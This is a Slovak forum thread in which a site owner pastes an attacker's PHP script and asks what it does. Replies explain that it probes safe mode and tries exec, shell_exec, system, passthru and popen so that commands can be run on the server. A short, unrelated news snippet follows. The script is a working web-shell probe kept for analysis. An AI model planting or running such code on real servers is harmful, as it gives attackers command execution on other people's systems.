Zákerný útok !.. o čo ide??

Zaznamenal som útok na moju stránku, ktorý smeruje na tento odkaz: odkaz na txt O čo ide v tomto kóde ?????????
--------------------------------------------- <html><head><title>/\/\/\ Response CMD /\/\/\</title></head><body bgcolor=DC143C>
<H1>Changing this CMD will result in corrupt scanning !</H1>
</html></head></body>
<?php
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}
else{
ini_restore("safe_mode");
ini_restore("open_basedir");
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}else{
echo("Safe Mode of this Server is : ");
echo("SafemodeON");
}
}
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
?>

Pre pridávanie komentárov sa musíte prihlásiť.

- Re: Zákerný útok !.. o čo ide?? 09.11.2009 | 22:36
  bedňa LegacyIce-antiX Administrátor
  
  Nechce sa mi to celé lúštiť, ale vyzerá to že ten človek sa pokúša vylistovať obsah tvojho webu aby napríklad zistil či tam, nemáš heslo do databázy a pod, nepoužívaš nähodou joomlu? Tá mala nejaký bug, treba upgrade.
  
  Táto správa neobsahuje vírus, pretože nepoužívam MS Windows. http://kernelultras.org
  - Re: Zákerný útok !.. o čo ide?? 10.11.2009 | 00:07
    Milan Dvorský debian,mint kde,android Administrátor
    
    kod sa snazi zistit, na akom OS bezi server, nasledne zistuje gid, potom zistuje, ci je zapnuty safemode a skusa otvorit adresar. s tym, ze nasledne sa snazi skusit ten script, ci vie vykonat passthru, exec, system a pod, ktore vlastne vedia na unix based strojoch vykonat napriklad aj shellovy (v tomto pripade podstrceny) command, ktory by otvoril cestu utocnikovi na server. a plus to, co spominal bedna ...
    
    Moja strana | Blog
- Re: Zákerný útok !.. o čo ide?? 10.11.2009 | 12:30
  dodoedo Fedora Linux Používateľ
  
  Ahoj.
  
  Naštuduj si toto:
  http://www.theopensourcerer.com/2007/12/20/is-this-a-hackers-tool/
  
  G. Orwell: "Čím více se společnost vzdaluje od pravdy, tím více bude nenávidět ty, kteří ji říkají."

Správy

Na Slovensku vyšla bezplatná knižka napísaná umelou inteligenciou

14.03 | 10:26 | Stanislav Hoferek

Dátum udalosti: 13.03.2024

V Greenie knižnici bola vydaná prvá kniha, ktorá je vytvorená z väčšiny umelou inteligenciou. Pokrýva udalosti Druhej svetovej vojny, vrátane rôznych doplnkových tém. Kniha je v angličtine.

Zdroj: Blog na Denníku N

Žiadne komentáre | IT novinky